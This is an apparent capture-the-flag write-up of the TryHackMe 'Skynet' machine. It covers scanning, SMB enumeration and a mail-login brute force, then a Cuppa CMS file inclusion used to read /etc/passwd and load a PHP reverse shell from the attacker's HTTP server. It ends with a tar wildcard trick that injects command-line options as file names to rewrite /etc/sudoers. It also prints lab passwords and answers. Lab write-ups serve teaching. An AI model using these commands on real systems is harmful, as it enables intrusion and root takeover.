Skynet

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.149.41

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80,110,139,143,445

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80,110,139,143,445 -oN nmap 10.10.149.41

Enumeration

Port 80: HTTP

Lets visit the website

It is a search engine, but nothing works if we search something , neither do any of the buttons work. The source code has nothing interesting as well

Lets run a gobuster scan to find hidden directories and files

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41

Looks like we found some directories, but we are not allowed to access any of them

After a while we get another hit

The directory is called /squirrelmail, lets visit it and see if we have access to it.

And we do, its a login form, so we need to find a username and a password.

Port 139,445: SMB

Lets use a tool called enum4linux which is a tool that enumerates Samba services on a machine

enum4linux -a 10.10.149.41

Looking at the output, in the Share Enumeration section, the Share names print$ and IPC$ are common, but anonymous and milesdyson are not common, and milesdyson looks like a username, so lets add that to our notes.

Now lets try to access those shares using smbclient

smbclient //10.10.149.41/anonymous

After hitting enter for the password

We are logged in. Lets now explore.

There is a directory and a file, lets transfer the file to our machine and the files in the directory to our machine too.

get <file-name>

I am only transferring the log1.txt file because the other files are empty as shows in the ls output.

Lets now read the files that we transferred to our machine.

cat <file-name>

So the attention.txt file tells us that all the employees passwords have been changed and all of them are required to change their passwords. And the second file looks like a password list, and the name of the file was log, it might be older passwords, and we can also theorize that someone might have not changed their password, for example the person who wrote the attention note, Miles Dyson. We can try to brute force the squirrel mail service we found on the webserver with the username milesdyson and the password list we just saw.

Now I wanted to try using hydra or burp suite to do this, but I was looking at the walkthrough of John Hammond and the python script that he made was very interesting and valuable, so I made one and used that to find the correct password. Lets go through the steps he did.

Lets first go to the developer tools (Ctrl + Shift + i) and then send a request with a random username and password. In the Network tab of the developer tools, we see a redirect.php file get created when we hit login, lets look into that file.

Now lets copy the request , we can do that by right clicking on the file name and going to copy and then click copy as cURL. We can now go to a cURL to python code request code converter, now paste the code in their and then copy the python code to a file.

I'm going to create the file bruteforce.py , once you do that we need to modify the code a bit to make it bruteforce the service with the username and password list we provide.

This is how the code looks before any modifications

And this is the code after modifications, I can try to explain what this code does, but I think John Hammond does a better job at doing that, so go watch the video he made if you want to understand the code.

Now if we save and run the code, we find the password

The password is cyborg007haloterminator, which is also the answer to the first question in this room

Port 80: HTTP

We can now login into squirrel mail.

There are three emails that Miles Dyson received, the ones with (no subject) have nothing of interest, but the Samba Password reset email has something really interesting

We now have the password for SMB of Miles Dyson, which is )s{A&2Z=F^n_E.B' .

Port 139,445: SMB

Now that we have the password for Miles Dyson's SMB server, we can login using smbclient.

smbclient -U milesdyson //10.10.149.41/milesdyson

We are now logged in. Lets list what files or directories there are in the server.

Looking through the files, there is only one file in the notes directory that looks interesting, so lets transfer that file to our machine.

Now lets read the important.txt file

Looks like the first line gives us a directory that we can visit on the webserver, so lets do that.

Nothing of interest here nor in the source code, lets run gobuster to find hidden directories and files. Also the directory we just found is the answer to the second question in this room

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41/45kra24zxs28v3yd/

We find an administrator page, lets go visit it.

Its a login page. If we try to use the credentials we found earlier, it does not work. Looking at the page we have the service name which is Cuppa CMS so why don't we go to searchsploit and look if we have any exploits that we can use to exploit this service.

searchsploit Cuppa

And we do, so lets copy the exploit to our directory.

searchsploit -m php/webapps/25971.txt

We now can answer the third question in this room.

Exploitation

Reading through the scripts, it looks like we can see the /etc/passwd file, so lets try looking at that file.

We need to change the target and alerts place holders as well

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Looks like it works, so they also mentioned that we can run php files on the server with this exploit, so what if we write a command in a php file and send that to the server by opening a http server on our machine, we can do this because there is a remote file inclusion vulnerability on the web server.

So first lets make the file with the command, lets call it command.php.

Lets see if the command whoami works.

Now we have to start a http server so that the victim machine can connect back to us.

python -m http.server 8080

Now we have to run the curl command to connect to our machine and run the command.php file.

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/command.php

And it works as we get the right output. Now what if we change the command.php file to a reverse shell php file to get a reverse shell on the machine. We can find a reverse shell php file here.

Once you copy the file and change the IP to your tryhackme IP as they mentioned in the file, you can copy it to the directory where you will start the http server. Once you do that change the file in the curl URL and also start a Netcat reverse shell listener with the same IP in the php reverse shell file.

nc -lvnp 1234

Once you do that, use the curl command. Also make sure you started the python http server

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/shell.php

After you hit enter, you should get a reverse shell on the machine.

You can now read the user.txt which is the answer to the fourth question of this room.

And you can use these commands to stabilize your shell

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
Ctrl + z
stty raw -echo; fg
reset

Looking at the files and directories, there is a particular directory and file that looks interesting, which is /backups and backup.sh

Lets read the file.

It looks like its changing directories into the /var/www/html folder and then running a tar command with the other file in the /backups directory. Looking at the tar command and at the * symbol, I was thinking that there should be a exploit based on this so I went to google and searched for it and found it.

The part that we are interested in is this

I can try to explain what these command do, but not as good as John Hammond, so make sure to go there and look at what the commands do and mean.

The commands that we will use are: (Also make sure to cd to /var/www/html before running the commands.)

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1

Wait for a while and then run the sudo -l command.

Now we can run all commands as root, so lets switch users to root.

sudo su root

You can also read the root flag which is the answer to the last question of the room.

Last updated